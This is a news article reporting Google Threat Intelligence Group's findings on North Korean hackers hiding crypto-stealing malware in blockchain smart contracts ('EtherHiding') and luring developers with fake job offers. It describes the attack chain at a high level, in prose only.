North Korean hackers have utilized a technique to deploy malware aimed at stealing cryptocurrency and sensitive information by incorporating harmful code into smart contracts on public blockchain networks, as reported by Google’s Threat Intelligence Group.
This method, referred to as “EtherHiding,” surfaced in 2023 and is often combined with social engineering strategies, such as contacting victims with fraudulent job offers and prestigious interviews, directing users to harmful websites or links, according to Google.
Hackers gain control over a legitimate website through a Loader Script and inject JavaScript code into that site, activating a separate malicious code package in a smart contract that is intended to steal funds and data as soon as the user engages with the compromised site.
The compromised website will interact with the blockchain network using a “read-only” function that does not actually perform a transaction on the ledger, allowing the threat actors to evade detection and reduce transaction costs, Google researchers noted.
The report emphasizes the importance of vigilance in the crypto community to protect users from scams and hacks often employed by malicious actors attempting to steal funds and valuable information from individuals and organizations alike.
Related: CZ’s Google account targeted by ‘government-backed’ hackers
Be aware: North Korea’s social engineering campaign analyzed
The threat actors will establish fake companies, recruitment agencies, and profiles to target software and cryptocurrency developers with fabricated job offers, according to Google.
After the initial outreach, the attackers shift communication to messaging platforms like Discord or Telegram and instruct the victim to undertake a job assessment or complete a coding task.
“The core of the attack takes place during a technical evaluation phase,” Google Threat Intelligence reported. During this stage, the victim is typically told to download harmful files from online code repositories like GitHub, where the malicious payload is hosted.
In other cases, the attackers entice the victim into a video call, where a fabricated error message is shown to the user, prompting them to download a patch to remedy the error. This software patch also contains harmful code.
Once the malicious software is installed on a machine, a second-stage JavaScript-based malware known as “JADESNOW” is activated to steal sensitive data.
A third phase may be implemented for high-value targets, granting the attackers extended access to a compromised machine and other systems connected to its network, Google cautioned.
Magazine: Inside a 30,000 phone bot farm stealing crypto airdrops from real users
